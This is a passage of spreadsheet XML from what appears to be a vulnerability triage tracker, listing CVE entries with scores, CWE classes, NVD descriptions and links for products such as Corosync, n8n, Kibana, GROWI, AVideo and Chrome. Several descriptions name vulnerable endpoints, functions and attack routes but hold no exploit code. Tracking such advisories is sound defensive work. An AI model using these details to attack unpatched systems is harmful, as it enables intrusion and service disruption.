r="L1701" s="5" t="inlineStr" /><c r="M1701" s="5" t="inlineStr" /><c r="N1701" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1701" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1701" s="5" t="inlineStr" /><c r="Q1701" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1701" s="5" t="inlineStr"><is><t>An integer overflow was found in Corosync's handling of membership commit token messages. The length-validation check for these messages can be bypassed on 32-bit systems due to an integer overflow in the calculation of the expected message length, allowing a crafted network packet to trigger an out-of-bounds memory access that crashes the Corosync daemon. This results in a denial of service for the affected cluster node. The overflow does not occur on 64-bit systems, where the length calculation is correctly performed in 64-bit arithmetic.</t></is></c><c r="S1701" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81666</t></is></c></row><row r="1702"><c r="A1702" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1702" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1702" s="5" t="inlineStr"><is><t>CVE-2026-81792</t></is></c><c r="D1702" s="5" t="n"><v>6.5</v></c><c r="E1702" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1702" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1702" s="5" t="inlineStr" /><c r="H1702" s="5" t="n"><v>0.002</v></c><c r="I1702" s="5" t="inlineStr" /><c r="J1702" s="5" t="inlineStr" /><c r="K1702" s="5" t="inlineStr" /><c r="L1702" s="5" t="inlineStr" /><c r="M1702" s="5" t="inlineStr" /><c r="N1702" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1702" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1702" s="5" t="inlineStr" /><c r="Q1702" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="R1702" s="5" t="inlineStr"><is><t>Unauthenticated Privilege Escalation in Product Catalog Enquiry for WooCommerce by MultiVendorX &lt;= 6.1.4 versions.</t></is></c><c r="S1702" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81792</t></is></c></row><row r="1703"><c r="A1703" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1703" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1703" s="5" t="inlineStr"><is><t>CVE-2026-81802</t></is></c><c r="D1703" s="5" t="n"><v>6.5</v></c><c r="E1703" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1703" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1703" s="5" t="inlineStr" /><c r="H1703" s="5" t="n"><v>0.002</v></c><c r="I1703" s="5" t="inlineStr" /><c r="J1703" s="5" t="inlineStr" /><c r="K1703" s="5" t="inlineStr" /><c r="L1703" s="5" t="inlineStr" /><c r="M1703" s="5" t="inlineStr" /><c r="N1703" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1703" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1703" s="5" t="inlineStr" /><c r="Q1703" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1703" s="5" t="inlineStr"><is><t>Unauthenticated Insecure Direct Object References (IDOR) in WpEvently &lt;= 5.6.0 versions.</t></is></c><c r="S1703" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81802</t></is></c></row><row r="1704"><c r="A1704" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1704" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1704" s="5" t="inlineStr"><is><t>CVE-2026-82059</t></is></c><c r="D1704" s="5" t="n"><v>6.5</v></c><c r="E1704" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1704" s="5" t="inlineStr" /><c r="H1704" s="5" t="n"><v>0.003</v></c><c r="I1704" s="5" t="inlineStr" /><c r="J1704" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1704" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1704" s="5" t="inlineStr" /><c r="M1704" s="5" t="inlineStr" /><c r="N1704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1704" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1704" s="5" t="inlineStr" /><c r="Q1704" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="R1704" s="5" t="inlineStr"><is><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is></c><c r="S1704" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t></is></c></row><row r="1705"><c r="A1705" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1705" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1705" s="5" t="inlineStr"><is><t>CVE-2026-82069</t></is></c><c r="D1705" s="5" t="n"><v>6.5</v></c><c r="E1705" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1705" s="5" t="inlineStr" /><c r="H1705" s="5" t="n"><v>0.003</v></c><c r="I1705" s="5" t="inlineStr" /><c r="J1705" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1705" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1705" s="5" t="inlineStr" /><c r="M1705" s="5" t="inlineStr" /><c r="N1705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1705" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1705" s="5" t="inlineStr" /><c r="Q1705" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="R1705" s="5" t="inlineStr"><is><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is></c><c r="S1705" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t></is></c></row><row r="1706"><c r="A1706" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1706" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1706" s="5" t="inlineStr"><is><t>CVE-2026-82123</t></is></c><c r="D1706" s="5" t="n"><v>6.5</v></c><c r="E1706" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1706" s="5" t="inlineStr"><is><t>vulnreport@tenable.com</t></is></c><c r="G1706" s="5" t="inlineStr" /><c r="H1706" s="5" t="n"><v>0.002</v></c><c r="I1706" s="5" t="inlineStr" /><c r="J1706" s="5" t="inlineStr" /><c r="K1706" s="5" t="inlineStr" /><c r="L1706" s="5" t="inlineStr" /><c r="M1706" s="5" t="inlineStr" /><c r="N1706" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1706" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1706" s="5" t="inlineStr" /><c r="Q1706" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1706" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Tangible Loops &amp; Logic.</t></is></c><c r="S1706" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82123</t></is></c></row><row r="1707"><c r="A1707" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1707" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1707" s="5" t="inlineStr"><is><t>CVE-2026-82299</t></is></c><c r="D1707" s="5" t="n"><v>6.5</v></c><c r="E1707" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1707" s="5" t="inlineStr"><is><t>security@elastic.co</t></is></c><c r="G1707" s="5" t="inlineStr" /><c r="H1707" s="5" t="n"><v>0.002</v></c><c r="I1707" s="5" t="inlineStr" /><c r="J1707" s="5" t="inlineStr" /><c r="K1707" s="5" t="inlineStr" /><c r="L1707" s="5" t="inlineStr" /><c r="M1707" s="5" t="inlineStr" /><c r="N1707" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1707" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1707" s="5" t="inlineStr" /><c r="Q1707" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1707" s="5" t="inlineStr"><is><t>Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t></is></c><c r="S1707" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82299</t></is></c></row><row r="1708"><c r="A1708" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1708" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1708" s="5" t="inlineStr"><is><t>CVE-2026-84204</t></is></c><c r="D1708" s="5" t="n"><v>6.5</v></c><c r="E1708" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1708" s="5" t="inlineStr" /><c r="H1708" s="5" t="n"><v>0.002</v></c><c r="I1708" s="5" t="inlineStr" /><c r="J1708" s="5" t="inlineStr" /><c r="K1708" s="5" t="inlineStr" /><c r="L1708" s="5" t="inlineStr" /><c r="M1708" s="5" t="inlineStr" /><c r="N1708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1708" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P1708" s="5" t="inlineStr" /><c r="Q1708" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1708" s="5" t="inlineStr"><is><t>GROWI contains an access control vulnerability in the GET /_api/v3/attachment/:id endpoint that fails to validate page access permissions. Authenticated attackers can retrieve attachment metadata from pages they cannot view by supplying known attachment identifiers.</t></is></c><c r="S1708" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84204</t></is></c></row><row r="1709"><c r="A1709" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1709" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1709" s="5" t="inlineStr"><is><t>CVE-2026-84282</t></is></c><c r="D1709" s="5" t="n"><v>6.5</v></c><c r="E1709" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1709" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1709" s="5" t="inlineStr" /><c r="H1709" s="5" t="n"><v>0.002</v></c><c r="I1709" s="5" t="inlineStr" /><c r="J1709" s="5" t="inlineStr" /><c r="K1709" s="5" t="inlineStr" /><c r="L1709" s="5" t="inlineStr" /><c r="M1709" s="5" t="inlineStr" /><c r="N1709" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1709" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1709" s="5" t="inlineStr" /><c r="Q1709" s="5" t="inlineStr" /><c r="R1709" s="5" t="inlineStr"><is><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is></c><c r="S1709" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84282</t></is></c></row><row r="1710"><c r="A1710" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1710" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1710" s="5" t="inlineStr"><is><t>CVE-2026-84327</t></is></c><c r="D1710" s="5" t="n"><v>6.5</v></c><c r="E1710" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1710" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1710" s="5" t="inlineStr" /><c r="H1710" s="5" t="n"><v>0.002</v></c><c r="I1710" s="5" t="inlineStr" /><c r="J1710" s="5" t="inlineStr" /><c r="K1710" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L1710" s="5" t="inlineStr" /><c r="M1710" s="5" t="inlineStr" /><c r="N1710" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1710" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1710" s="5" t="inlineStr" /><c r="Q1710" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1710" s="5" t="inlineStr"><is><t>Incorrect authorization in Autofill in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t></is></c><c r="S1710" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84327</t></is></c></row><row r="1711"><c r="A1711" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1711" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1711" s="5" t="inlineStr"><is><t>CVE-2026-84391</t></is></c><c r="D1711" s="5" t="n"><v>6.5</v></c><c r="E1711" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1711" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1711" s="5" t="inlineStr" /><c r="H1711" s="5" t="n"><v>0.002</v></c><c r="I1711" s="5" t="inlineStr" /><c r="J1711" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1711" s="5" t="inlineStr" /><c r="L1711" s="5" t="inlineStr" /><c r="M1711" s="5" t="inlineStr" /><c r="N1711" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1711" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1711" s="5" t="inlineStr" /><c r="Q1711" s="5" t="inlineStr"><is><t>CWE-457</t></is></c><c r="R1711" s="5" t="inlineStr"><is><t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t></is></c><c r="S1711" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t></is></c></row><row r="1712"><c r="A1712" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1712" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1712" s="5" t="inlineStr"><is><t>CVE-2026-84685</t></is></c><c r="D1712" s="5" t="n"><v>6.5</v></c><c r="E1712" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1712" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1712" s="5" t="inlineStr" /><c r="H1712" s="5" t="n"><v>0.002</v></c><c r="I1712" s="5" t="inlineStr" /><c r="J1712" s="5" t="inlineStr" /><c r="K1712" s="5" t="inlineStr" /><c r="L1712" s="5" t="inlineStr" /><c r="M1712" s="5" t="inlineStr" /><c r="N1712" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1712" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1712" s="5" t="inlineStr" /><c r="Q1712" s="5" t="inlineStr"><is><t>CWE-488</t></is></c><c r="R1712" s="5" t="inlineStr"><is><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is></c><c r="S1712" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84685</t></is></c></row><row r="1713"><c r="A1713" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1713" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1713" s="5" t="inlineStr"><is><t>CVE-2026-85044</t></is></c><c r="D1713" s="5" t="n"><v>6.5</v></c><c r="E1713" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1713" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1713" s="5" t="inlineStr" /><c r="H1713" s="5" t="n"><v>0.002</v></c><c r="I1713" s="5" t="inlineStr" /><c r="J1713" s="5" t="inlineStr" /><c r="K1713" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L1713" s="5" t="inlineStr" /><c r="M1713" s="5" t="inlineStr" /><c r="N1713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1713" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1713" s="5" t="inlineStr" /><c r="Q1713" s="5" t="inlineStr"><is><t>CWE-672</t></is></c><c r="R1713" s="5" t="inlineStr"><is><t>Use of released resource in Mobile in Google Chrome on on Android prior to 152.0.7977.82 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t></is></c><c r="S1713" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85044</t></is></c></row><row r="1714"><c r="A1714" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1714" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1714" s="5" t="inlineStr"><is><t>CVE-2026-85162</t></is></c><c r="D1714" s="5" t="n"><v>6.5</v></c><c r="E1714" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1714" s="5" t="inlineStr" /><c r="H1714" s="5" t="n"><v>0.001</v></c><c r="I1714" s="5" t="inlineStr" /><c r="J1714" s="5" t="inlineStr" /><c r="K1714" s="5" t="inlineStr" /><c r="L1714" s="5" t="inlineStr" /><c r="M1714" s="5" t="inlineStr" /><c r="N1714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1714" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1714" s="5" t="inlineStr" /><c r="Q1714" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R1714" s="5" t="inlineStr"><is><t>AVideo through commit c91b5975d contains a cross-site request forgery vulnerability in plugin/Live/saveLive.php that lacks forbidIfNotPost and forbidIfInvalidToken protections. Attackers can craft malicious image tags to overwrite authenticated streamers' RTMP keys, passwords, and titles, hijacking live broadcasts.</t></is></c><c r="S1714" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85162</t></is></c></row><row r="1715"><c r="A1715" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1715" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1715" s="5" t="inlineStr"><is><t>CVE-2026-85769</t></is></c><c r="D1715" s="5" t="n"><v>6.5</v></c><c r="E1715" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1715" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1715" s="5" t="inlineStr" /><c r="H1715" s="5" t="n"><v>0.004</v></c><c r="I1715" s="5" t="inlineStr" /><c r="J1715" s="5" t="inlineStr" /><c r="K1715" s="5" t="inlineStr" /><c r="L1715" s="5" t="inlineStr" /><c r="M1715" s="5" t="inlineStr" /><c r="N1715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1715" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1715" s="5" t="inlineStr" /><c r="Q1715" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1715" s="5" t="inlineStr"><is><t>A flaw was found in libtpms, a library that provides software TPM 2.0 emulation. When restoring TPM 2.0 state (for example during a virtual machine's power-on or state/migration restore), a malformed state blob can supply an oversized skip-block length that is not validated against the remaining size of the input buffer. This can drive an internal size counter negative, which bypasses a subsequent bounds check due to an unsafe signed-to-unsigned conversion, causing the parser to read memory outside the bounds of the heap buffer holding the state data. Successful exploitation can crash the process hosting libtpms (such as swtpm), resulting in a denial of service of the emulated TPM device and the virtual machine that depends on it. No data corruption or information disclosure was confirmed.</t></is></c><c r="S1715" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85769</t></is></c></row><row r="1716"><c r="A1716" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1716" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1716" s="5" t="inlineStr"><is><t>CVE-2026-86077</t></is></c><c r="D1716" s="5" t="n"><v>6.5</v></c><c r="E1716" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1716" s="5" t="inlineStr" /><c r="H1716" s="5" t="n"><v>0.003</v></c><c r="I1716" s="5" t="inlineStr" /><c r="J1716" s="5" t="inlineStr" /><c r="K1716" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1716" s="5" t="inlineStr" /><c r="M1716" s="5" t="inlineStr" /><c r="N1716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1716" s="5" t="inlineStr" /><c r="Q1716" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1716" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the /chat WebSocket route accepted a resumeToken and resumed a paused execution without checking that the target node supported chat messages. An anonymous form submitter who received that token could reuse it on the chat route to release a Send-and-Wait, non-chat HITL, or Wait approval gate. The affected authorization logic is packages/cli/src/chat/chat-execution-manager.ts, where canResumeOverChat did not gate the resume target. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="S1716" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86077</t></is></c></row><row r="1717"><c r="A1717" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1717" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1717" s="5" t="inlineStr"><is><t>CVE-2026-86078</t></is></c><c r="D1717" s="5" t="n"><v>6.5</v></c><c r="E1717" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1717" s="5" t="inlineStr" /><c r="H1717" s="5" t="n"><v>0.003</v></c><c r="I1717" s="5" t="inlineStr" /><c r="J1717" s="5" t="inlineStr" /><c r="K1717" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1717" s="5" t="inlineStr" /><c r="M1717" s="5" t="inlineStr" /><c r="N1717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1717" s="5" t="inlineStr" /><c r="Q1717" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="R1717" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the Instance AI workflow summary used node names and connection keys from stored workflows as ordinary object keys. A workflow submitted through the REST API could contain __proto__ or constructor, causing nested writes to reach Object.prototype in the main n8n process and disrupt later requests. The affected function is summarizeWorkflowStructure in packages/@n8n/instance-ai/src/tools/workflows/summarize-workflow.ts. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="S1717" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86078</t></is></c></row><row r="1718"><c r="A1718" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1718" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1718" s="5" t="inlineStr"><is><t>CVE-2026-86079</t></is></c><c r="D1718" s="5" t="n"><v>6.5</v></c><c r="E1718" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1718" s="5" t="inlineStr" /><c r="H1718" s="5" t="n"><v>0.003</v></c><c r="I1718" s="5" t="inlineStr" /><c r="J1718" s="5" t="inlineStr" /><c r="K1718" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1718" s="5" t="inlineStr" /><c r="M1718" s="5" t="inlineStr" /><c r="N1718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1718" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1718" s="5" t="inlineStr" /><c r="Q1718" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1718" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Elasticsearch and ElasticSecurity nodes interpolated workflow-controlled index and document identifiers directly into REST request paths. An identifier containing path separators or dot segments could select another index or a cluster administration endpoint under the stored Elasticsearch credential. The affected request construction includes packages/nodes-base/nodes/Elastic/Elasticsearch/GenericFunctions.ts and the missing toPathSegment encoding. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="S1718" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t></is></c></row><row r="1719"><c r="A1719" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1719" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1719" s="5" t="inlineStr"><is><t>CVE-2026-86082</t></is></c><c r="D1719" s="5" t="n"><v>6.5</v></c><c r="E1719" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1719" s="5" t="inlineStr" /><c r="H1719" s="5" t="n"><v>0.002</v></c><c r="I1719" s="5" t="inlineStr" /><c r="J1719" s="5" t="inlineStr" /><c r="K1719" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1719" s="5" t="inlineStr" /><c r="M1719" s="5" t="inlineStr" /><c r="N1719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1719" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1719" s="5" t="inlineStr" /><c r="Q1719" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1719" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the OpenAI Chat Model node enforced credential allowed-domain restrictions for normal calls but not for the model-search dropdown. A workflow editor could set options.baseURL to an arbitrary host and make the searchModels path send the openAiApi credential there. The affected implementation is packages/@n8n/nodes-langchain/nodes/llms/LMChatOpenAi/methods/loadModels.ts, which omitted assertOpenAiCredentialAllowsUrl. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="S1719" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t></is></c></row><row r="1720"><c r="A1720" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1720" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1720" s="5" t="inlineStr"><is><t>CVE-2026-86255</t></is></c><c r="D1720" s="5" t="n"><v>6.5</v></c><c r="E1720" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1720" s="5" t="inlineStr" /><c r="H1720" s="5" t="n"><v>0.002</v></c><c r="I1720" s="5" t="inlineStr" /><c r="J1720" s="5" t="inlineStr" /><c r="K1720" s="5" t="inlineStr" /><c r="L1720" s="5" t="inlineStr" /><c r="M1720" s="5" t="inlineStr" /><c r="N1720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1720" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1720" s="5" t="inlineStr" /><c r="Q1720" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1720" s="5" t="inlineStr"><is><t>wger before 2.5 fails to validate the maximum duration of routine date ranges, allowing authenticated users to create routines spanning arbitrarily long periods. Attackers can trigger the date_sequence computation via routine detail endpoints, forcing the server to iterate thousands of times per request and exhaust worker threads, denying service to legitimate users.</t></is></c><c r="S1720" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86255</t></is></c></row><row r="1721"><c r="A1721" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1721" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1721" s="5" t="inlineStr"><is><t>CVE-2026-86550</t></is></c><c r="D1721" s="5" t="n"><v>6.5</v></c><c r="E1721" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1721" s="5" t="inlineStr"><is><t>psirt@zte.com.cn</t></is></c><c r="G1721" s="5" t="inlineStr" /><c r="H1721" s="5" t="n"><v>0.003</v></c><c r="I1721" s="5" t="inlineStr" /><c r="J1721" s="5" t="inlineStr" /><c r="K1721" s="5" t="inlineStr" /><c r="L1721" s="5" t="inlineStr" /><c r="M1721" s="5" t="inlineStr" /><c r="N1721" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1721" s="5" t="inlineStr" /><c r="Q1721" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R1721" s="5" t="inlineStr"><is><t>NuBrowser lacks protocol whitelist validation for the S.browser_fallback_url field of intent://, allowing attackers to inject javascript: URLs via 302 redirects. This results in a universal cross‑site scripting (UXSS) vulnerability that enables script execution within the origin of arbitrary websites.</t></is></c><c r="S1721" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t></is></c></row><row r="1722"><c r="A1722" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1722" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1722" s="5" t="inlineStr"><is><t>CVE-2026-86597</t></is></c><c r="D1722" s="5" t="n"><v>6.5</v></c><c r="E1722" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1722" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G1722" s="5" t="inlineStr" /><c r="H1722" s="5" t="n"><v>0.001</v></c><c r="I1722" s="5" t="inlineStr" /><c r="J1722" s="5" t="inlineStr" /><c r="K1722" s="5" t="inlineStr" /><c r="L1722" s="5" t="inlineStr" /><c r="M1722" s="5" t="inlineStr" /><c r="N1722" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1722" s="5" 